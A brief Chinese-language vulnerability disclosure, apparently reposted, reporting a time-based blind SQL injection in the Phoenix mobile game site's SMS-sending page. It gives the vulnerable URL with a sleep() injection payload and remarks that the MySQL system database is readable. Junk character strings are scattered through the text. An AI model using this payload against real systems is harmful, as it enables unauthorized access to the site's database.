简要描述:
: @: \3 q; }# A; k2 F$ Q凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。" y9 L$ G* a7 k1 v) @, L- M
- z+ u! m4 ~/ n _
详细说明:
# y- a. P1 k4 a' \$ {存在SQL盲注url:3 k( r6 N2 E. G2 ~+ [6 W' E
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
& |9 s" @! V) g) ~4 _& ^http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
. B+ l3 f. x: f$ ]0 @http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
0 T1 X& m. T* u6 y( f; j- k$ s) i6 Zhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg5 L S: X0 R- h# d0 Q
% I' t1 g3 I5 Y能看到mysql系统数据库,看来user权限应该很高的。。 |